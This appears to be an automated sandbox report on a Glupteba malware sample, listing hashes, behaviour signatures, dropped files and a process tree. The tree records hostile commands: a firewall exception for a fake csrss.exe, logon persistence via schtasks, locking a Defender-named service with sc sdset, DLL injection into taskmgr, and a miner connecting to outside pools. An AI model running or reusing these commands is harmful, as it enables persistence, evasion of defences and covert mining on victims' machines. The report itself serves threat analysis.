Analysis
-
max time kernel
290s -
max time network
297s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
18-04-2024 22:59
General
-
Target
a0ba24fab1e6e7ba3dc2b804c76610dd3c04630f973f409ac356ef08d8b5707a.exe
-
Size
4.3MB
-
MD5
a44d1116f17c932856735b53646f90fc
-
SHA1
dc70589cdb3aac3a78d4d65ed889594d027c36e6
-
SHA256
a0ba24fab1e6e7ba3dc2b804c76610dd3c04630f973f409ac356ef08d8b5707a
-
SHA512
302b6f57dd740250a9e6497f810d7fc7b7851ec1e46a1d5d45f21b25fa2da999fc9925ccfd439dd94c384034ff3fc2d9fbfc59964dbb229cc77bc87c60a51e50
-
SSDEEP
98304:3uyKg3jZU541Yj5PzgHjePXqhtl0kIuUwvjD6Id/WQWVfUkpHoy:eyTZ51GrgHhhtl0VuUwv6Idifmy
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 35 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Executes dropped EXE 4 IoCs
-
UPX packed file 9 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 7 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 7 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
-
Suspicious use of WriteProcessMemory 36 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a0ba24fab1e6e7ba3dc2b804c76610dd3c04630f973f409ac356ef08d8b5707a.exe"C:\Users\Admin\AppData\Local\Temp\a0ba24fab1e6e7ba3dc2b804c76610dd3c04630f973f409ac356ef08d8b5707a.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a0ba24fab1e6e7ba3dc2b804c76610dd3c04630f973f409ac356ef08d8b5707a.exe"C:\Users\Admin\AppData\Local\Temp\a0ba24fab1e6e7ba3dc2b804c76610dd3c04630f973f409ac356ef08d8b5707a.exe"2⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:804⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 7dbac624-6151-4ab8-81ec-f680f7b70789 --tls --nicehash -o showlock.net:443 --rig-id 7dbac624-6151-4ab8-81ec-f680f7b70789 --tls --nicehash -o showlock.net:80 --rig-id 7dbac624-6151-4ab8-81ec-f680f7b70789 --nicehash --http-port 3433 --http-access-token 7dbac624-6151-4ab8-81ec-f680f7b70789 --randomx-wrmsr=-15⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 6205⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgb1hfr1.z0d.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeFilesize
479KB
MD51001b6d32108d8ac5ce7d08eaf17a65e
SHA185f364000d8b50e14d7259805b1d35ea07f58b97
SHA256f32a870a27f91416280b29623daac57b2272e879b013e192de0d5d1e2d17a748
SHA512beaeb3a87045460c08b5214cf2a225d005bbf731a638aec52c7cceee1efab67f84265f3ceac1a79afd51546391b3494338a88892306572cb072b94d69c14c28c
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeFilesize
655KB
MD58ab21fe2e205211837990d5be6020ef9
SHA1e5f2fde17b85e7f4d77f36004d21f6893704f38c
SHA256b3acf1716906c6e0e5d668e58cdc4b57fb13ed438bca80578876c94bab760c04
SHA512431bad060cc02a696cae1a84f4dee9445ead4af7e1313a5c2974ff3b5e98c296ee603a9f0a6cd9fd45302bbeab9752de61957aaca4faf7aa3b2c7e74833fbd53
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeFilesize
730KB
MD54b319c4ad9b900c51012836136a47d80
SHA140a68be5cb9a8e89bd54e1a00f26e1fdbf27c8fb
SHA2569f5410f94dc1ec6ce582f223726950e6f7aed90b0378fb378481a622e8e1ca3e
SHA512c3c9b5926ea41d5aa84437f57fde2a53070b7edb63fd8c36039706cb03d6b45449ddb4e4692b19edc73db208cf0cd77801be22c454601375babd5ee22a0fbf0c
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeFilesize
744KB
MD512c64b73afee0158534e6fc4bc953fbb
SHA1d1745650659842fb3033f582145a67d5741077bc
SHA256bb5136b70d3d7aaf9f56b61f46be7c99a99fdb99982b2e9c6554be4ed5e19ba7
SHA51260e2700b865f441450e848aae0904dd165a52e95dc2d9fcd92991202a8170d97241f6c0540ae5dd6e0efe783668d555159219db94279caf82c331770b9131d9c
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeFilesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeFilesize
657KB
MD5d9111f0239cfa8a31251b6a026dff456
SHA17edbcbabc3bcb670e52c61663b92890588c3e16b
SHA256244fa14bade7c6e138ffde5a3c17f4a77f0c02157ecad750c609c86b00a8976e
SHA5127273a7dfc1d77d073fac0844226250dfc039b4efe5fe3a9509803bc315d0ddc9b6829ccc025aa3f0257bfa8b19263ac78fbd63a2d52753c4e679af6ffea1df81
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeFilesize
544KB
MD59bc1f066b206d5c07c76c81a315fa1e3
SHA1de64e7a6e9235f672c48e4fc3debf754d4be5957
SHA256f305abbba6a287424afd3f9064efc880fd1a8cb47f6812b39894748384a8b9ad
SHA512549f879cc746a440c61b66d18e5bdc303c43c160cdffae96171ac65ab3caa1902ae76048fe1b939080f261971201e93210dbe61d3d2e241810bbbf6eb4368665
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD573c6ca88ac4b33fc7f20f0040d9d91fd
SHA15d67c28c28b9974a17e59dc2d24fd2737014bead
SHA256eef7bbd28ba284bad351459765673b23aa03080acbcd0c5af1a8d6c4ef54192b
SHA512b3bc5bf28f76f373e432cceed22b93b47c1bb2cd8e5b6bc742a148b606774b4a43bbc697ae7d2d1a8fe25a1a1e9dc68ee0b7da4e5a77a920cef1bdbb00a28f7f
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5bf7ee1ed3946f97289a5612a5a740b71
SHA1c01f07acf7b5779d52d5491dbf82fe075314444c
SHA256bae20cf68f097f6d55427501d6edebed4bd071a6345258ace14cb143f3da47a2
SHA512c8527351081613f1fdae7ad144b5ca94715a0cc1e4053533273e48205390f6153ef0e27d8e0738b93e168bbaf5b1f07fe62d39ba64f88ed2bbebbb57846fe6b6
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5d8a8af0316aafe5728e3be46cf829d03
SHA1f6d52467f2ee5a8b6412ef6e2e1c947e916c660b
SHA256fd1942983af5975d95bcf3b8900a7b118fdbc11137c81a82fa91d8c498f52fc2
SHA512ce621019114ea98b8fbe453075b7ee525c115e2bd984732d19f4dae2fe7af9bde773859b992f9fc3e97169b0328a2eefecb737635e3f866ab0d02f636c720d17
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD52655438ec6ccaabd0bcbe9565897becc
SHA124b86d7cba9c1e0fa422e8f3abd29845ea49ccd2
SHA25690067a2378615c07b7693667a45aa61fd3f9802deea4872456cf4309e5a37bc9
SHA512b910037462f5041b8c9562b5db994047e84e98d2645158d39fe9e0343df7f0b71c15007fc692dfab75e49a2ed12f2feb12538135eba4b51f0b45ab4691a0876c
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5df4a8cd7f5f93484aa1d5643244bd57a
SHA14b21a7eaca3137da5260eae39e3075a13185fc4c
SHA256ce19571939e38a381a0949c7bce8a3479e9ed37aa4bafd3e0dd30e10a039f901
SHA512284863f958e2ff6a2103abe5eef6a278c212d39281ba9e6fffcea92bab45e20f6f46cc3e329f3b06e9554c36c9483a86c615e4622101949a76e14a17c5f1f1c6
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5372ccb66bd8e7cb5ac545b320a7f0f73
SHA136962a09f0d248554ecacca4476e253f0ad14544
SHA256d9cc2621d3aa03e8fc39688d7c2c6b3a8728ceaf4c00289f95ced003cbb11139
SHA512006991b63ce21de5d924c3cde5691f14f7d13823a89f1f1309e32bce0e0a56b313edd2da03d3b58eeddeddfba2d5e4307c68ff18ee35934827b6aac076ffb9de
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5fa0167711c3a76529ff8a54b09bbc4cc
SHA1a8f6d08d2c692905114ad266c6bf9ab1400b2e2c
SHA256edcd85a80cd33ec03e35e544839c14cc8d3704a3c53d7ccec5cbb5b224007f3d
SHA512d33c73798828386f641e5042c1ba262d18c951362615e580f2bb1395a3e0c8bfc13339c76d79febc55f1aef6b97ad536e951b0f6cd1ae2858aa797c5490b6ad0
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5d8b0207f30540be568ef395cda0376a4
SHA157307cf71d698316165038cfe2c8117cfeba4eef
SHA256baeac57dcbb2e74bddf6a404f4aa31eaae6c76e3c91c23a573ef71354162b953
SHA5120764414cdd66dca6e16655affe9201bf20c9029e7d90cf79572835a9b8a0ca9e3e65f77e27628fa25abe5155153fe602499f751777e3ea3e3ce3a2edd752b734
-
C:\Windows\rss\csrss.exeFilesize
4.3MB
MD5a44d1116f17c932856735b53646f90fc
SHA1dc70589cdb3aac3a78d4d65ed889594d027c36e6
SHA256a0ba24fab1e6e7ba3dc2b804c76610dd3c04630f973f409ac356ef08d8b5707a
SHA512302b6f57dd740250a9e6497f810d7fc7b7851ec1e46a1d5d45f21b25fa2da999fc9925ccfd439dd94c384034ff3fc2d9fbfc59964dbb229cc77bc87c60a51e50
-
C:\Windows\rss\csrss.exeFilesize
612KB
MD579af816879cc475c6afa5425cb142eb9
SHA136f305d35695911f10595a394cd55242142c9a62
SHA256401ffba775299b659fab99702395b4d0a5a244156fa35869af839f55dbe5ff13
SHA512e98b7332eb866d445d7ab6fd3a2b39d55dac58cda9acbc047335594eae48a33008f778f57d6850ec67a664deb5b81fcb8280045fcc1fb92cd34346b0452ea7a1
-
C:\Windows\windefender.exeFilesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
memory/500-1826-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1804-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1830-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1828-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1834-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1824-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1822-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1820-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1818-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1816-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1814-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1812-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1810-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1808-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1806-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1832-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1802-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1800-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1798-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1836-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1789-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1838-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1840-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1842-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1538-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1844-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1848-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/500-1044-0x0000000002F00000-0x00000000032F9000-memory.dmpFilesize
4.0MB
-
memory/500-1045-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/620-2342-0x0000014E7B5F0000-0x0000014E7B610000-memory.dmpFilesize
128KB
-
memory/912-2344-0x0000000000400000-0x00000000008E1000-memory.dmpFilesize
4.9MB
-
memory/1260-302-0x0000000002F10000-0x00000000037FB000-memory.dmpFilesize
8.9MB
-
memory/1260-2-0x0000000002F10000-0x00000000037FB000-memory.dmpFilesize
8.9MB
-
memory/1260-3-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/1260-298-0x0000000002B00000-0x0000000002F06000-memory.dmpFilesize
4.0MB
-
memory/1260-301-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/1260-1-0x0000000002B00000-0x0000000002F06000-memory.dmpFilesize
4.0MB
-
memory/1668-1051-0x0000000007E90000-0x00000000081E0000-memory.dmpFilesize
3.3MB
-
memory/1668-1048-0x0000000072F10000-0x00000000735FE000-memory.dmpFilesize
6.9MB
-
memory/1668-1053-0x0000000008470000-0x00000000084BB000-memory.dmpFilesize
300KB
-
memory/1668-1049-0x0000000007220000-0x0000000007230000-memory.dmpFilesize
64KB
-
memory/1668-1050-0x0000000007220000-0x0000000007230000-memory.dmpFilesize
64KB
-
memory/1904-1797-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/2264-827-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/2264-1041-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/2264-305-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/2264-304-0x0000000002B10000-0x0000000002F15000-memory.dmpFilesize
4.0MB
-
memory/2264-582-0x0000000002B10000-0x0000000002F15000-memory.dmpFilesize
4.0MB
-
memory/2264-798-0x0000000000400000-0x0000000000D1C000-memory.dmpFilesize
9.1MB
-
memory/2868-1799-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/2868-1803-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/3044-312-0x0000000007CA0000-0x0000000007CEB000-memory.dmpFilesize
300KB
-
memory/3044-333-0x000000006FD30000-0x0000000070080000-memory.dmpFilesize
3.3MB
-
memory/3044-310-0x0000000006A00000-0x0000000006A10000-memory.dmpFilesize
64KB
-
memory/3044-309-0x0000000006A00000-0x0000000006A10000-memory.dmpFilesize
64KB
-
memory/3044-549-0x0000000072FB0000-0x000000007369E000-memory.dmpFilesize
6.9MB
-
memory/3044-339-0x0000000006A00000-0x0000000006A10000-memory.dmpFilesize
64KB
-
memory/3044-338-0x0000000009200000-0x00000000092A5000-memory.dmpFilesize
660KB
-
memory/3044-332-0x000000006FCE0000-0x000000006FD2B000-memory.dmpFilesize
300KB
-
memory/3044-308-0x0000000072FB0000-0x000000007369E000-memory.dmpFilesize
6.9MB
-
memory/3044-311-0x0000000007720000-0x0000000007A70000-memory.dmpFilesize
3.3MB
-
memory/3044-331-0x000000007E690000-0x000000007E6A0000-memory.dmpFilesize
64KB
-
memory/4064-576-0x000000006FCE0000-0x000000006FD2B000-memory.dmpFilesize
300KB
-
memory/4064-795-0x0000000072FB0000-0x000000007369E000-memory.dmpFilesize
6.9MB
-
memory/4064-577-0x000000006FD30000-0x0000000070080000-memory.dmpFilesize
3.3MB
-
memory/4064-553-0x0000000072FB0000-0x000000007369E000-memory.dmpFilesize
6.9MB
-
memory/4064-575-0x000000007F300000-0x000000007F310000-memory.dmpFilesize
64KB
-
memory/4064-555-0x0000000006A60000-0x0000000006A70000-memory.dmpFilesize
64KB
-
memory/4064-554-0x0000000006A60000-0x0000000006A70000-memory.dmpFilesize
64KB
-
memory/4840-65-0x0000000008C10000-0x0000000008C86000-memory.dmpFilesize
472KB
-
memory/4840-73-0x000000007E540000-0x000000007E550000-memory.dmpFilesize
64KB
-
memory/4840-6-0x00000000042A0000-0x00000000042D6000-memory.dmpFilesize
216KB
-
memory/4840-7-0x0000000072EB0000-0x000000007359E000-memory.dmpFilesize
6.9MB
-
memory/4840-300-0x0000000072EB0000-0x000000007359E000-memory.dmpFilesize
6.9MB
-
memory/4840-8-0x0000000004290000-0x00000000042A0000-memory.dmpFilesize
64KB
-
memory/4840-281-0x0000000009BE0000-0x0000000009BE8000-memory.dmpFilesize
32KB
-
memory/4840-276-0x0000000009BF0000-0x0000000009C0A000-memory.dmpFilesize
104KB
-
memory/4840-83-0x0000000009C70000-0x0000000009D04000-memory.dmpFilesize
592KB
-
memory/4840-82-0x0000000004290000-0x00000000042A0000-memory.dmpFilesize
64KB
-
memory/4840-81-0x0000000009A70000-0x0000000009B15000-memory.dmpFilesize
660KB
-
memory/4840-76-0x0000000009A10000-0x0000000009A2E000-memory.dmpFilesize
120KB
-
memory/4840-75-0x000000006FC10000-0x000000006FF60000-memory.dmpFilesize
3.3MB
-
memory/4840-72-0x0000000009A30000-0x0000000009A63000-memory.dmpFilesize
204KB
-
memory/4840-74-0x000000006FBC0000-0x000000006FC0B000-memory.dmpFilesize
300KB
-
memory/4840-9-0x0000000006E90000-0x00000000074B8000-memory.dmpFilesize
6.2MB
-
memory/4840-10-0x0000000006D00000-0x0000000006D22000-memory.dmpFilesize
136KB
-
memory/4840-34-0x0000000008B50000-0x0000000008B8C000-memory.dmpFilesize
240KB
-
memory/4840-15-0x0000000007AD0000-0x0000000007B1B000-memory.dmpFilesize
300KB
-
memory/4840-14-0x0000000007A90000-0x0000000007AAC000-memory.dmpFilesize
112KB
-
memory/4840-13-0x0000000007650000-0x00000000079A0000-memory.dmpFilesize
3.3MB
-
memory/4840-12-0x0000000006DB0000-0x0000000006E16000-memory.dmpFilesize
408KB
-
memory/4840-11-0x00000000075C0000-0x0000000007626000-memory.dmpFilesize
408KB
-
memory/5028-1037-0x0000000072FB0000-0x000000007369E000-memory.dmpFilesize
6.9MB
-
memory/5028-828-0x00000000065C0000-0x00000000065D0000-memory.dmpFilesize
64KB
-
memory/5028-801-0x00000000065C0000-0x00000000065D0000-memory.dmpFilesize
64KB
-
memory/5028-822-0x000000006FD30000-0x0000000070080000-memory.dmpFilesize
3.3MB
-
memory/5028-821-0x000000006FCE0000-0x000000006FD2B000-memory.dmpFilesize
300KB
-
memory/5028-800-0x00000000065C0000-0x00000000065D0000-memory.dmpFilesize
64KB
-
memory/5028-799-0x0000000072FB0000-0x000000007369E000-memory.dmpFilesize
6.9MB